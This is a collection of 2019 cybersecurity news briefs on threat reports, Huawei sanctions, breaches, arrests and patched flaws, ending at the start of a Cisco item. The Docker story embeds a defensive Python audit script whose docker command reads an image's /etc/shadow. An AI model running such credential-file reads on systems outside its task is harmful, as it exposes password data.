“Nearly 60% of threats shared at least one domain indicating the majority of botnets leverage established infrastructure. IcedID is an example of this 'why buy or build when you can borrow' behavior. In addition, when threats share infrastructure they tend to do so within the same stage in the kill chain. It is unusual for a threat to leverage a domain for exploitation and then later leverage it for C2 traffic. This suggests infrastructure plays a particular role or function when used for malicious campaigns,” the report said.

“We, unfortunately, continue to see the cyber-criminal community mirror the strategies and methodologies of nation-state actors, and the evolving devices and networks they are targeting,” said Phil Quade, chief information security officer, Fortinet, in a press release.

“Organizations need to rethink their strategy to better future-proof and manage cyber risks. An important first step involves treating cybersecurity more like a science – doing the fundamentals really well – which requires leveraging the cyberspace fundamentals of speed and connectivity for defense. Embracing a fabric approach to security, micro and macro segmentation and leveraging machine learning and automation as the building blocks of AI can provide tremendous opportunity to force our adversaries back to square one.”

Encryption is Often Poorly Deployed, if Deployed at All

Encryption continues to be a challenge for companies, as only a quarter of organizations admit to using it for at-rest data, and for emails and data centers.

According to research by Thales and IDC, encryption for email is adopted by only around 27% of the European respondents they recently surveyed, while the numbers decline for data at rest, data centers, Big Data environments and full disk encryption. The only instance of European respondents ranking higher than the global figure was in the use of cloud-native provider encryption.

Speaking at an event in London, Thales senior regional sales director, Kai Zobel, said that despite the introduction of GDPR a year ago “companies struggle to understand where the data is” and he has seen some companies buy a product to “encrypt some islands but then they struggle to continue. So we see thousands of potential servers that need to be encrypted but they [some companies] just do 200 and they think they are done.”

Zobel added that with more and more politics in the workplace, data “doesn’t want to be touched” and there is a feeling that security cannot be relied upon.

“They [organizations] have long lists of what to implement in the next 12 months, but they struggle to implement it and one of the main reasons is because of complexity,” Zobel said. “This is because they don’t have enough people to understand the technology in the best way possible.”

He also commented that a number of companies look for “good enough compliance” and people would rather spend less than ensure 100% security, “so they are just trying to find good solutions but not 'The Best' solution.”

Jason Hart, security evangelist at Thales, said that there is a wider problem of nothing changing in the last 25 years, except that we are creating more and more data. That has become a commodity, and “because of the acceleration of cloud I say to a company ‘what are you trying to protect?’ and after an hour we may get to a conversation about data and two hours later we may get to the type of data that they deem to be valuable.”

However, Hart argued that companies do not understand the risks that they are trying to mitigate, “and information security is really simple, it is about people, data and process.”

Speaking to Infosecurity, Hart said that if you look at every major breach that has occurred, there are too many instances of companies not deploying encryption properly, and also people do not look at the risk.

“You encrypted the data in the database, but what talks to the database? The application, so the data now traverses into the application’s code text and then from the application it goes into the cloud,” he said. “So they do it in silos and elements, but when people do it wrong, there is a false sense of security.”

DDoS Attacks on the Rise After Long Period of Decline

The number of DDoS attacks increased by 84% in the first quarter of 2019 compared to Q4 2018, according to new research from Kaspersky Lab.

The global cybersecurity company’s findings, detailed in its DDoS Attacks in Q1 2019 report, come in the wake of dramatically falling numbers of DDoS attacks recorded throughout 2018, suggesting that cyber-criminals are once again turning to DDoS as an attack method after a sustained period of shifting their attention to other sources of income last year, such as cryptomining.

What’s more, Kaspersky Lab discovered substantial growth in the number of attacks that lasted more than an hour. The company suggested that the launch of newer DDoS-for-hire services could explain the sudden rise in the number of DDoS attacks in 2019.

“The DDoS attack market is changing,” said Alexey Kiselev, business development manager on the Kaspersky DDoS Protection team. “New DDoS services appear to have replaced ones shut down by law enforcement agencies. As organizations implement basic countermeasures, attackers target them with long-lasting attacks. It is difficult to say if the number of attacks will continue to grow, but their complexity is showing no signs of slowing down.

“We recommend that organizations prepare themselves effectively, in order to withstand sophisticated DDoS attacks.”

Kaspersky Lab’s advice for DDoS attack defense included:

• Ensuring that web and IT resources can handle high traffic

• Using professional solutions to protect the organization against attacks

Washington Issues Temporary License to Huawei

The US government has issued a temporary license to Huawei and its affiliates, allowing American companies to supply the telecoms and handset giant until August.

Despite reports emerging over the weekend of various chipmakers halting supplies to the Chinese firm after it was placed on an Entity List last week, the Commerce Department appears to have softened its stance.

Issued on Monday, the temporary general license for Huawei and 68 non-US affiliates will run for 90 days, bringing it up to August 19, 2019.

It covers various areas, including: supplies to ensure Huawei’s networks and equipment are fully operational; software updates for existing Huawei handsets; and disclosure of any security vulnerabilities to the firm.

The license also authorizes US firms to engage with Huawei and its affiliates “as necessary for the development of 5G standards as part of a duly recognized international standards body.”

At the same time, Huawei founder Ren Zhengfei has struck a defiant tone in state media reports, claiming the US “underestimates” the firm’s capabilities and that it has already made efforts to mitigate the impact of any supply chain restrictions.

He has also reportedly claimed that no company can catch Huawei in terms of its 5G technology, a fact that Western lawmakers are grappling with in weighing up how to treat the company.

Lock the company out of 5G completely and it could add years to implementation, impacting customers — or at least, that’s Huawei's argument.

Although UK Prime Minister Theresa May agreed only to allow Huawei to supply non-core parts of carriers’ 5G networks, the decision by the leading Five Eyes nation remains controversial.

A new report by right-wing think tank the Henry Jackson Society co-authored by a Conservative MP and a former government security advisor claims there is “significant risk” in allowing Huawei to supply the UK’s 5G networks.

The report includes a foreword from former MI6 boss, Richard Dearlove, calling on the government to reconsider its position.

Aussie Government IT Worker Arrested for Cryptomining

An Australian government IT contractor has been arrested on suspicion of making thousands from an illegal cryptocurrency mining operation at work.

The 33-year-old New South Wales man appeared in court today after allegedly earning AU$9000 ($6188) by “modifying his agency’s computer systems,” according to the Australian Federal Police (AFP).

At Sydney Local Court, he was charged with unauthorized modification of data to cause impairment, and unauthorized modification of restricted data, contrary to the Criminal Code Act 1995.

The charges carry a maximum penalty of 10 years and two years behind bars, respectively.

“Australian taxpayers put their trust in public officials to perform vital roles for our community with the utmost integrity,” argued acting commander, Chris Goldsmid, AFP manager cybercrime operations. “Any alleged criminal conduct which betrays this trust for personal gain will be investigated and prosecuted.”

It’s unclear how the man was eventually caught, but his home was raided by the AFP in March, and a personal laptop, phone, employee ID cards and data files were seized.

Cryptocurrency mining continues to be a threat to businesses, while consumer detections have fallen to almost zero, according to a Malwarebytes report released in April. It said the latter trend had been influenced by Coinhive’s decision to shut down earlier this year.

Although most cryptomining in businesses occurs covertly, directed by external botnet herders in charge of compromised machines, there is always the risk of an insider threat.

A Chinese headmaster was fired last year after secretly mining cryptocurrency using his school’s electricity supply. Hunan man Lei Hua hooked up eight mining machines to the mains, running up an electricity bill of 14,700 yuan ($2125) mining Ethereum 24 hours a day.

Phishing Kit 16Shop Targets Apple Users, Hackers

Researchers have discovered a hidden backdoor in a commercial phishing kit, 16Shop, used to attack Apple customers, according to Akamai.

“When it comes to targeting Apple users and their personal and financial data, 16Shop has emerged as a go to kit for those who can afford it. While 16Shop is sold to criminals looking to collect sensitive information from a targeted subset of the Internet community, at least one pirated version circulating online houses a backdoor that siphons off the data harvested and delivers it to a Telegram channel – proving once more that there is no honor among thieves," wrote Akamai researcher Amiram Cohen.

According to the research, this highly sophisticated and neatly constructed kit has layered defenses, as well as attack mechanisms. “It's a true multi-level kit, running different stages for different brands, depending on the information the victim provides. It has the ability to change its layout and presentation depending on platform, so mobile users will see a website tailored to their device, while desktop users see something better suited to their situation,” wrote Cohen.

Credit: Akamai

The phishing kit was allegedly developed by an Indonesian whom Cohen said “has the skill to be a legitimate security community member, as well as the skills to maintain a healthy career in development. Instead, and most unfortunately, their knowledge is applied to a criminal enterprise.”

Until now, the individual has been known only as either devilscream or Riswanda. In addition to Cohen, multiple online researchers “have located various personal artifacts of Riswanda's, including GitHub repositories, security presentations, past examples of website defacements, pictures of family and friends, email address, and social media accounts.”

However, some users of the phishing kit have been sharing their criminally obtained information without their knowledge through a backdoor that makes a copy of the victim's information and secrets it over to a bot waiting in a room on Telegram, according to Cohen.

“Akamai first discovered this backdoor while examining code inside of main.php, which was obfuscated in a way that made it stand out. The highly obfuscated code collects information for all of the forms visited by the victim, and no matter what storage and delivery options are selected by the 16Shop operator, the victim's data is siphoned off and sent to the Telegram bot via API calls,” Cohen said.

The author reportedly has released video demonstrations showing active usage of Telegram as a means of data storage. “However, like other popular phishing kits, 16Shop has been pirated. Based on comparisons against multiple versions of the 16Shop, the backdoor only appears in the de-obfuscated version of the kit,” Cohen said.

Fifth of Docker Containers Have No Root Passwords

A fifth of the world’s most popular Docker containers contain a security issue which could make them vulnerable to attack in some circumstances, a researcher has discovered.

Kenna Security principal security engineer, Jerry Gamblin, explained that after recent Cisco Talos research revealed Alpine Linux Docker images were shipping with no (nulled) root passwords, he decided to dig a little deeper.

Running a script on the 1000 most popular containers in the Docker store, he found 194 (19.4%) also had nulled root passwords.

“The findings are interesting, but I don’t want to be overly alarmist. Just because a container has no root password does not mean that it is automatically vulnerable,” he explained.

“These findings could lead to configuration-based vulnerabilities in certain situations, as was the case with the Alpine Linux vulnerability.”

Specifically, only containers which use Linux pluggable authentication modules (PAM) or “some other mechanism which uses the system shadow file as an authentication database” are vulnerable to exploitation, as Cisco detailed.

The most popular container on the list affected by the issue was kylemanna/openvpn: a software unit that has been used over 10 million times, according to Gamblin.

Other names on the list included govuk/governmentpaas, hashicorp, microsoft, monsanto and mesosphere.

In the Alpine Linux case, exposed containers could find they are at risk of Docker image vulnerability (CVE-2019-5021), whereby an attacker can elevate their privileges to root within the container.

“Deploying containers that allow users to authenticate as root should be avoided at all costs, because authenticating as root is already outside the scope of ‘best practices’ for secure containers or generally in systems,” argued Gamblin.
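As an added example (not Gamblin's script or Cisco's tooling), the kind of check that finds this condition: it parses /etc/shadow contents and flags accounts whose password field is empty, distinguishing them from locked accounts, which is the difference that matters when an image authenticates via PAM or the shadow file. The sample shadow lines are constructed, and image_shadow_cmd assumes a local docker CLI and an image that ships /bin/cat.

```python
"""Audit /etc/shadow entries for accounts with an empty (nulled) password field.

Added example, not the page's or Gamblin's code. In /etc/shadow the second
colon-separated field is the password hash: an empty field means no password
is needed to authenticate, while a field starting with "!" or "*" means the
account is locked. As the Cisco Talos advisory cited above notes, an empty root
field is only exploitable where something (e.g. PAM) actually authenticates
against the shadow file, so the audit reports the condition, not exploitability.
"""
import subprocess
from typing import Dict, List

# Constructed sample: a nulled root entry (the shape of the Alpine finding)
# next to locked system accounts and a user with a real (fake-valued) hash.
SAMPLE_SHADOW = """\
root:::0:::::
bin:!::0:::::
daemon:*:18000:0:99999:7:::
app:$6$saltsalt$FAKEHASHFAKEHASH:18000:0:99999:7:::
"""


def classify(password_field: str) -> str:
    """Map a shadow password field to 'empty', 'locked' or 'hashed'."""
    if password_field == "":
        return "empty"
    if password_field.startswith(("!", "*")):
        return "locked"
    return "hashed"


def audit_shadow(text: str) -> Dict[str, str]:
    """Return {username: status} for every well-formed line of a shadow file."""
    result: Dict[str, str] = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 2:
            continue  # malformed line: skip rather than guess
        result[fields[0]] = classify(fields[1])
    return result


def nulled_accounts(text: str) -> List[str]:
    """Usernames whose password field is empty; 'root' here is the finding."""
    return [user for user, status in audit_shadow(text).items() if status == "empty"]


def image_shadow_cmd(image: str) -> List[str]:
    """docker argv that prints an image's /etc/shadow without running its
    entrypoint. Assumes (hypothetical setup) a docker CLI on PATH and an
    image that contains /bin/cat; distroless images would need another route."""
    return ["docker", "run", "--rm", "--entrypoint", "/bin/cat", image, "/etc/shadow"]


def audit_image(image: str) -> List[str]:
    """Pull the shadow file out of an image and report accounts with no password."""
    proc = subprocess.run(image_shadow_cmd(image), capture_output=True, text=True, check=True)
    return nulled_accounts(proc.stdout)


if __name__ == "__main__":
    # Offline demonstration on the constructed sample; audit_image() needs docker.
    print(nulled_accounts(SAMPLE_SHADOW))  # ['root']
```

Running audit_image over a list of image names reproduces the survey Gamblin describes; an empty result for root does not by itself mean the image is safe if it authenticates some other way.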

KnowBe4 Announces Acquisition of CLTRe

KnowBe4 has announced the acquisition of CLTRe, adding the capability to measure security culture into its portfolio.

Led by Kai Roer, CLTRe is a Norwegian company focused on helping organizations assess, build, maintain and measure a strong security posture. It will continue to operate as an independent subsidiary of KnowBe4.

The acquisition will mean that CLTRe’s toolkit and Security Culture Framework will be available to all KnowBe4 customers later this year.

Stu Sjouwerman, CEO of KnowBe4, said: “Today’s announcement brings KnowBe4 very valuable tools to help our customers measure what matters – their security culture – so they can make decisions about how to improve. We’re excited to welcome Kai and the CLTRe team to the KnowBe4 family and to enhance our European presence while supporting more global customers.”

Roer said that KnowBe4 “is a natural fit for our evidence-based analytics and measurement tools, as KnowBe4 customers will now be able to measure their security cultures, benchmark against their industry sectors, and pinpoint exactly what kind of security culture they have.”

He said: “With KnowBe4 and CLTRe, organizations can gain true insight into their security culture, improve their security with pinpoint accuracy, report their progress to their board of directors and educate their users to make smarter security decisions.”

CLTRe measures the seven dimensions of security culture: behavior, responsibilities, cognition, norms, compliance, communication and attitudes.  

Kai Roer, along with Espen Otterstadt and Nicola Whiting, discussed security culture as part of the Infosecurity Magazine Online Summit.

Ecuador Shares Assange’s Legal Docs with US

Complying with a request by US authorities, Ecuadorian officials are preparing to hand over documents that are reportedly the entire legal defense against Julian Assange, compiled during the time he has been living in the Ecuadorian embassy in London, according to WikiLeaks.

"On Monday Ecuador will perform a puppet show at the embassy of Ecuador in London for their masters in Washington, just in time to expand their extradition case before the UK deadline on 14 June," WikiLeaks editor-in-chief Kristinn Hrafnsson said. "The Trump administration is inducing its allies to behave like it's the Wild West."

Assange’s lawyers are reportedly not permitted to be present during what is being called the “illegal seizure of his property.”

“The material includes two of his manuscripts, as well as his legal papers, medical records and electronic equipment. The seizure of his belongings violates laws that protect medical and legal confidentiality and press protections,” WikiLeaks said.

Ecuador officials also refused a request by UN special rapporteur on privacy, who requested permission to monitor Ecuador's seizure of Assange's property.

The US had previously asked Ecuador to share audiovisual material and additional documents, which had reportedly been collected during an internal spying operation against Assange, WikiLeaks said.

"It is extremely worrying that Ecuador has proceeded with the search and seizure of property, documents, information and other material belonging to the defense of Julian Assange, which Ecuador arbitrarily confiscated, so that these can be handed over to the agent of political persecution against him, the United States. It is an unprecedented attack on the rights of the defence, freedom of expression and access to information exposing massive human rights abuses and corruption. We call on international protection institutions to intervene to put a stop to this persecution," said Baltasar Garzón, international legal coordinator for the defense of Assange and WikiLeaks.

Though Ecuador is obviously not a part of the EU, "if arguing that because Assange is an EU resident and therefore subject to the protections of GDPR, Article 23 makes a pretty strong case that those protections become restricted if revealing that data was a matter of national defense or if some other form of legal matter, either criminal or civil, is involved,” said Nathan Wenzler, senior director of cybersecurity at Moss Adams.

“While I’m not a lawyer, it seems likely that all nations involved would have a good chance of demonstrating some sort of legal action involved here and thus, make this action a non-event under the provisions of GDPR. Morally, there’s a whole other argument here that could (and should, in my opinion) be had. However, I’m not sure there’s much that can or will be done under GDPR in this case.”

New South Wales Announces New Cybersecurity Position

In an attempt to centralize all of the cyber efforts and strategies of the state, New South Wales (NSW) has announced a new Cyber Security NSW office, to be led by Tony Chapman, chief cybersecurity officer, according to a May 20 press release.

Chapman assumed the position today, which falls under the department of customer service, and wrote via LinkedIn, “The changes reflect the leadership and coordination role required to uplift cyber security and decision-making across NSW Government.

I am performing the functions previously undertaken by the NSW Government Chief Information Security Officer (GCISO), established in March 2017, with a renewed focus on securing digital transformation and the continual improvement of customer service outcomes.”

To enable digital transformation, a part of the overall vision of the new customer service cluster, the office will focus on improving cybersecurity capabilities and standards to include a coordinated cyber-incident response plan and develop strategic cyber-policy positions through a revitalized cybersecurity senior officers’ group (CSSOG), according to Chapman.

To see the vision of the new customer service cluster to its fruition, Chapman said he will work to strengthen ties across NSW's government, other states' governments and the federal government to establish cybersecurity best practices that will yield better results for citizens.

“A key component of the role will be driving a culture of risk management and awareness to support greater resilience to cyber security threats. Tony and his team will build on the digital transformation work occurring across the NSW government, ensuring our digital spaces are safeguarded against cyber threats,” said the state government's chief information and digital officer, Greg Wells, in the press release.

“Cybersecurity NSW will continue its critical work enhancing whole-of-government cyber security capabilities and standards on behalf of NSW. It will also work more closely with the information and privacy commission on security, privacy and the availability of systems and services during the State’s digital transformation.”

Online Account Hijacker Forum OGUsers Hacked

An online forum used by those involved in online account hijacking has been breached, according to KrebsonSecurity.

The attack leaked the personal information of nearly 113,000 people. Krebs reportedly received a copy of the database, which included usernames, email addresses, hashed passwords, private messages and IP addresses.

The RaidForums administrator Omnipotent announced to forum members that he had made the OGUsers forum database available for download, writing:

Hello RaidForums Community,

Today I have uploaded the OGUsers Forum Database for you to download for free, thanks for reading and enjoy!

On the 12th of May 2019 the forum was breached; 112,988 users were affected. I have uploaded the data from this database breach along with their website source files. Their hashing algorithm was the default salted MD5, which surprised me. Anyway, the website owner has acknowledged data corruption but not a breach, so I guess I'm the first to tell you the truth; view his statement here, or if you don't want to visit their website, view it here. According to his statement he didn't have any recent backups, so I guess I will provide one on this thread lmfao.

Compromised data: Website activity, Usernames, Emails, IP Addresses, Passwords (Salted MD5), Source code, Website data, User private messages.

While users on the forum expressed concern about their identities being revealed as a result of the hack, Krebs said, “It’s difficult not to admit feeling a bit of schadenfreude in response to this event. It’s gratifying to see such a comeuppance for a community that has largely specialized in hacking others. Also, federal and state law enforcement investigators going after SIM swappers are likely to have a field day with this database, and my guess is this leak will fuel even more arrests and charges for those involved.”

LeakedSource Company Pleads Guilty

The operators of an infamous breached credentials site have pleaded guilty to trading in stolen information, according to Canadian police.

Defiant Tech, which owns the LeakedSource website, entered the plea on Friday at a court in Ottawa, a brief notice from the Royal Canadian Mounted Police (RCMP) stated.

The charges of “trafficking in identity information and possession of property obtained by crime” came after an investigation was launched by the police in 2016, when the RCMP found that servers hosting LeakedSource were located in Quebec.

Project “Adoration,” as it was known, saw the RCMP’s newly formed National Division Cybercrime Investigative Team receive assistance from the Dutch National Police and the FBI.

In December 2017, Jordan Evan Bloom, 27, from Thornhill, Ontario, was arrested on suspicion of making an estimated C$247,000 ($200,000) from the business.

The now-defunct site had a database of around three billion passwords and identity records, which users could access via simple search functionality for a fee. This information is said to have been purchased from hackers and lifted from the public domain. Data was taken from big-name companies like LinkedIn and MySpace.

"We are pleased with this latest development,” said superintendent Mike Maclean, officer in charge of criminal operations for RCMP National Division.

“This is all thanks to the relentless efforts put in by our men and women working in the National Division Cybercrime Investigative Team. I am immensely proud of this outcome as combating cybercrime is an operational priority for us."

A second man is suspected to have conspired with Bloom, but charges have so far not been brought.

Ex-CIA Man Gets 20 Years for Handing China Secrets

A former CIA intelligence officer has been sentenced to two decades behind bars after being found guilty last year of passing defense secrets to China.

Kevin Patrick Mallory, 62, of Leesburg, was found guilty by a federal jury in June 2018 of conspiracy to deliver, attempted delivery, delivery of national defense information to aid a foreign government, and making material false statements.

He is said to have been paid $25,000 for handing classified documents to 'Michael Yang,' a Chinese intelligence officer he met in Shanghai in March and April 2017.

These documents included information on CIA informants, according to the Department of Justice.

Fluent Mandarin-speaker Mallory is said to have scanned the Top Secret documents onto an SD card at his local FedEx store. Yet although he shredded the originals, the FBI found the carefully hidden storage device during a search of his home.

The disgraced former spy worked for various government agencies and defense contractors, including roles as a covert case officer for the CIA and an intelligence officer for the Defense Intelligence Agency (DIA). His Top Secret clearance is said to have been terminated in 2012 when he left government service.

“Former US intelligence officer Kevin Patrick Mallory will spend the next 20 years of his life in prison for conspiring to pass national defense information to a Chinese intelligence officer,” said assistant attorney general for national security, John Demers.

“This case is one in an alarming trend of former US intelligence officers being targeted by China and betraying their country and colleagues. This sentence, together with the recent guilty pleas of Ron Hansen in Utah and Jerry Lee in Virginia, deliver the stern message that our former intelligence officers have no business partnering with the Chinese, or any other adversarial foreign intelligence service.”

Lee is thought to have provided the information needed to take down a major CIA network in China between 2010 and 2012. The US is believed to be at a distinct intelligence disadvantage now with regards to China.

Chipmakers Cut Huawei Shipments

European and US chipmakers have stopped supplying Huawei with products while Google will cease providing technical Android support from the next OS iteration, as Donald Trump’s executive order starts to bite.

Google said in a tweet yesterday: “while we are complying with all US gov't requirements, services like Google Play & security from Google Play Protect will keep functioning on your existing Huawei device.”

However, it’s believed the same will not be true of new Huawei handsets. Google is also set to cut key support for the operating system from its next version, which could leave users without apps like YouTube and Google Maps, according to reports.

Huawei could still use the open source version of Android, although it has been developing an in-house OS which it could also switch across to in the event that Trump’s executive order is not reversed.

The firm is also being hit as global chipmakers cut supplies in compliance with the order. Qualcomm (smartphones), Intel (servers and laptops), Xilinx and Broadcom (networking kit) and many other US producers, as well as German chipmaker Infineon, have reportedly taken immediate action.

Huawei produces some processors and modems for its smartphones in-house, so Qualcomm’s decision is perhaps the least likely to affect it. The firm is said to have stockpiled other types of chips for several months while it waits to see whether the US action is a bargaining play or is set for the long-term.

Trump signed an executive order last week banning “foreign adversaries” from providing telecoms equipment in the US. However, Huawei and 70 subsidiaries were also placed on an “Entity List” meaning US firms are not able to supply it with their products unless Huawei is granted a special license from the Commerce Department.

Although the tech firms have already taken action, the department is still drawing up the enforcement plan, and has 150 days to do so.

Download Hijack Flaw Patched in Slack for Windows

Slack users have been urged to upgrade their applications and clients to the most recent version, 3.4.0, after Tenable researcher David Wells discovered a new vulnerability that would allow an attacker to share malicious hyperlinks that could alter where a victim’s files were stored.

Wells discovered a download hijack vulnerability in Slack Desktop version 3.3.7 for Windows. “This vulnerability, which has been patched, would have allowed an attacker to post a crafted hyperlink into a Slack channel or private conversation that changes the document download location path when clicked. It does require user interaction to exploit, giving it a CVSSv2 score of 5.5 (Medium),” today’s press release said.

If users click on the link, an attacker could not only steal future documents downloaded within Slack but also manipulate them, such as injecting malicious code that would compromise the victim’s machine once opened, according to Wells.

The attack reportedly can be performed through any Slack direct messaging or Slack channel to which an attacker might be authenticated.

“Using this attack vector, an insider could exploit this vulnerability for corporate espionage, manipulation, or to gain access to documents outside of their purview," which Wells discusses in depth in his blog post.

The flaw was found in the Slack desktop application for Windows version 3.3.7, which Tenable reported to Slack via HackerOne. “Slack patched the bug as part of its latest update for Slack Desktop Application for Windows, v3.4.0. Slack investigated and found no indication that this vulnerability was ever utilized, nor reports that its users were impacted. As always, users are encouraged to upgrade their apps and clients to the latest available version,” a Slack spokesperson said.

“The digital economy and global distributed workforce have brought new technologies to market with the ultimate goal of seamless connectivity,” said Renaud Deraison, co-founder and chief technology officer, Tenable. “But it’s critical that organizations realize this emerging technology is potentially vulnerable and part of their expanding attack surface. Tenable Research continues to work with vendors such as Slack to disclose our discoveries to ensure consumers and organizations are secure.”

More Orgs Use Booby Traps for Counterintelligence

A recent survey found that to gain counterintelligence the vast majority of organizations would allow an attacker to take decoy files rather than stop an attack in progress, according to the latest International Cyber Benchmark Index from the Neustar International Security Council (NISC).

A reported one in five companies are currently employing forensic investigations, as well as setting up honey pots and repositories of fake data to lure attackers in, but an impressive 71% of respondents said that instead of shutting down an attack when a bad actor accesses a deceptive file, they would be willing to let the malicious actors take a booby-trapped document, according to a May 16 press release.

Being able to collect intelligence could allow defenders to identify thieves in the future, potentially revealing information about the location, ownership and possible vulnerabilities of the hackers’ machines, the press release said.

Of the respondents surveyed, 51% said their enterprise had suffered a distributed denial-of-service (DDoS) attack, and 52% of participants also identified phishing as a growing threat with targeted hacking. DDoS attacks followed close behind at 49%.

“Security leaders increasingly feel that breaches are inevitable, and there is a growing appetite for advanced forensic tools that can deliver insights around attacker attribution and tactics in real time,” said Rodney Joffe, chairman of NISC and Neustar SVP and fellow.

“Whether they opt to use them like an alarm system, ejecting bad actors from the network upon contact with a honey pot or deceptive file, or for a more sophisticated counterintelligence operation that gathers vital information on attacker movements and methods, cybersecurity professionals want solutions that can provide better real-time awareness and understanding of the enemy.”

According to the survey, the threat of social engineering continues to rise across all vectors, with 48% of respondents admitting they witnessed an uptick in attempts via email, 38% noting a rise in text-based attempts and 36% reporting a rise in attempts via phone.

Responses showed that security pros are more aware not only of where attacks are originating but also of the types of attacks that pose the greatest threats.

Baltimore Won’t Pay Ransom, Systems Remain Down

The city of Baltimore’s computer systems have remained down since a ransomware attack hit more than a week ago, but the city says it will not pay the ransom despite today’s final 10-day deadline, according to a copy of the ransom note obtained by the Baltimore Sun.

The May 7 note warned that if the ransom were not paid within 10 days, the city would no longer be able to have its files returned. In the aftermath of the attack, Baltimore has reverted to using manual systems while it continues efforts to restore the downed system.

From the transportation department to the department of public works and even closing on real estate deals, everything is being held up in what CCN called “the most extensive attacks in history, affecting nearly every important aspect of city life.”

Despite the attackers warning that if the city called the FBI they would cut off contact, federal investigators are assisting in the efforts to free the crippled city. The message from Mayor Jack Young is clear – the city will not pay the ransom, according to WMAR.

As the city struggles to free itself from the constraints of this attack, city officials are looking for ways to be better prepared for future attacks. On May 16, Baltimore city council president Brandon Scott said he was launching a committee on cybersecurity and emergency preparedness.

“This cyber attack against Baltimore City government is a crisis of the utmost urgency,” Scott said, according to The Hill. “That is why I will convene a select committee, co-chaired by Councilman Eric Costello and Councilman Isaac ‘Yitzy’ Schleifer, to examine the City's coordination of cybersecurity efforts, including the Administration's response to the cybersecurity attack and testimony from cybersecurity experts.”

Hacktivist Attacks Have Fallen 95% Since 2015

The number of publicly disclosed hacktivist attacks has dropped by 95% between 2015 and 2018 thanks to the relative decline of Anonymous, new stats from IBM X-Force have revealed.

The firm claimed that it recorded 35 incidents in 2015, but the number dropped to just five two years later and two by 2018, with none so far this year.

The number attributed to Anonymous dropped from eight incidents in 2015 to only one tracked in 2018. This is significant as the hacktivist collective accounted for almost 45% of all attacks between 2015 and 2018.

Other groups tend to strike once or twice and then disappear, security analyst Camille Singleton explained in a blog post.

“Starting around 2010, Anonymous became one of the most prolific hacktivist groups in the world, reaching a peak of activity in early- to mid-2016, according to IBM X-Force data. Since then, attacks by Anonymous have declined significantly, possibly due to an attrition of key leadership, differences of opinion and a struggle to find an ideological focus,” she said.

“In addition to differences in viewpoint, several cyber actors have sought to masquerade as Anonymous actors over the past three years, using the moniker in an attempt to legitimize their actions or to tarnish the group’s name by connecting their activities to Anonymous.”

Another potential factor in the decline of hacktivist activity is law enforcement activity. Singleton claimed arrests and legal warnings may be acting as an effective deterrent.

“X-Force IRIS internal tracking of related arrests revealed that law enforcement agencies in the US, UK and Turkey have arrested at least 62 hacktivists since 2011,” she added.

“We suspect the actual number is greater than those publicly announced.”

Three of those arrested received sentences in 2018 and 2019 with jail time of three years or greater. One individual, Martin Gottesfeld, 34, of Somerville, was handed a 10-year sentence after DDoS-ing a Boston hospital in 2014.

Facebook Bans Israeli Firm For Election Meddling

Facebook has banned an Israeli company from its platform after detecting a massive, coordinated attempt to influence voters in Africa.

In a blog post yesterday, head of cybersecurity policy, Nathaniel Gleicher, revealed his team had been forced to remove 265 Facebook and Instagram accounts, Facebook Pages, Groups and events involved in “coordinated inauthentic behavior” managed by Archimedes Group.

In total, the shadowy Israeli firm ran 65 Facebook accounts, 161 Pages, 23 Groups, 12 events and four Instagram accounts. Its efforts reached a fairly wide audience, with around 2.8 million accounts following one or more of the Pages, while 5,500 accounts joined at least one of the Groups and around 920 people followed one or more of the Instagram accounts.

“The people behind this network used fake accounts to run Pages, disseminate their content and artificially increase engagement. They also represented themselves as locals, including local news organizations, and published allegedly leaked information about politicians,” Gleicher explained.

“The Page administrators and account owners frequently posted about political news, including topics like elections in various countries, candidate views and criticism of political opponents.”

Originating in Israel, the moves targeted users in Nigeria, Senegal, Togo, Angola, Niger and Tunisia, with Facebook also claiming to have found some suspicious activity in Latin America and Southeast Asia.

Around $812,000 was spent on Facebook ads paid for in Brazilian reals, Israeli shekels and US dollars. They ran from 2012 to 2019, which raises questions about why they weren’t spotted sooner.

“Coordinated inauthentic behavior” is the same moniker used to describe the activity of Russian state-sponsored attempts to interfere with the 2016 US Presidential election, which resulted in the indictment of 13 Russians and three companies from the country.

Archimedes Group, whose tagline is “winning campaigns worldwide,” has now been banned from the social network along with all its subsidiaries and issued with a cease and desist letter.

Europol and US Police Disrupt $100m Cybercrime Gang

Europol and US authorities are claiming victory after “dismantling” a major international cybercrime gang that used the GozNym banking trojan in an attempt to steal $100m from businesses.

A federal indictment was unsealed yesterday charging 10 members of the group with conspiracy to commit computer fraud, conspiracy to commit wire fraud and bank fraud, and conspiracy to commit money laundering. An eleventh has already been charged in a previous indictment.

Five of the gang are based in Russia and will therefore probably escape justice. However, the leader of the group, Alexander Konovolov — aka “NoNe,” and “none_1” — 35, of Tbilisi, Georgia, is being prosecuted in his home country, along with his alleged right-hand man Marat Kazandjian, aka “phant0m,” 31, of Kazakhstan and Tbilisi.

Another man, Eduard Malanici, aka “JekaProf,” is being prosecuted in his native Moldova for charges relating to alleged provision of crypting services, while Gennady Kapkanov — aka “Hennadiy Kapkanov,” “flux,” “ffhost,” “firestarter,” and “User 41” — 36, of Poltava, Ukraine, is being prosecuted in the eastern European nation for charges of bulletproof hosting for the group via the infamous Avalanche network.

He was arrested in 2018 after shooting an assault rifle at Ukrainian police searching his flat, while another man, Krasimir Nikolov, of Varna, Bulgaria, was extradited to the US in 2016 on charges of being the group’s account takeover specialist.

Each man had a specific role and was apparently recruited from Russian-speaking dark web forums. The GozNym malware was distributed to around 41,000 victim computers via phishing emails. Once they captured the victim’s online banking credentials, accounts were accessed and funds transferred to third-party accounts under the group’s control.

“International law enforcement has recognized that the only way to truly disrupt and defeat transnational, anonymized networks is to do so in partnership,” said Pennsylvania US attorney Scott Brady. 

“The collaborative and simultaneous prosecution of the members of the GozNym criminal conspiracy in four countries represents a paradigm shift in how we investigate and prosecute cybercrime.”

Roy Rashti, cybersecurity expert at BitDam, argued that the dismantling of this network is just a drop in the ocean, but a welcome move nonetheless.

“The ‘Goz’ in GozNym stands for the notorious Gozi banker malware which, although not new, was very successfully co-opted and iterated by hackers,” he added.

“This provides yet another example of how adversaries tweak known attacks to bypass legacy security solutions to reach and exploit the end user. This strategy allows cybercrime groups to operate like any successful business — with efficiency, dynamism and always staying one step ahead. That is of course, until they get caught.”

Critical Vulnerabilities in Cisco Products

A high-risk vulnerability in Cisco's secure boot process was disclosed earlier this week by Cisco and Red Balloon Security and is believed to affect an estimated 100 or more devices.

